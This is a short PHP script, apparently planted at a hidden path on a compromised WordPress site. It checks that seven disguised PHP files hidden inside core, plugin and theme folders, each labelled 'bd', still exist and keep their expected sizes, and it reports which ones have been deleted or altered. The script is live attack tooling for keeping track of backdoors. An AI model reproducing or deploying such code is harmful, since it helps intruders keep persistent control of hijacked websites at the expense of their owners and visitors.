File: /usr/www/users/azizavhsgy/.component
<?php $r = '/usr/www/users/azizavhsgy'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@43221@@65",
"/wp-content/plugins/redux-framework/redux-core/assets/scss/colors/midnight/offices.php"=>"bd@@44344@@1816",
"/wp-content/plugins/kk-star-ratings/src/core/actions/admin/tabs/rich.php"=>"bd@@44381@@1430",
"/wp-content/plugins/woocommerce/src/Internal/Admin/Notes/password.php"=>"bd@@44411@@652",
"/wp-content/themes/archives-1780949213/assets/images/custom.file.1.1780949213.php"=>"bd@@41862@@895",
"/wp-content/plugins/woocommerce/src/Admin/Features/Navigation/bottom1.php"=>"bd@@44450@@683",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-single-variation-notice/deleteSeminar.php"=>"bd@@44234@@1008"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');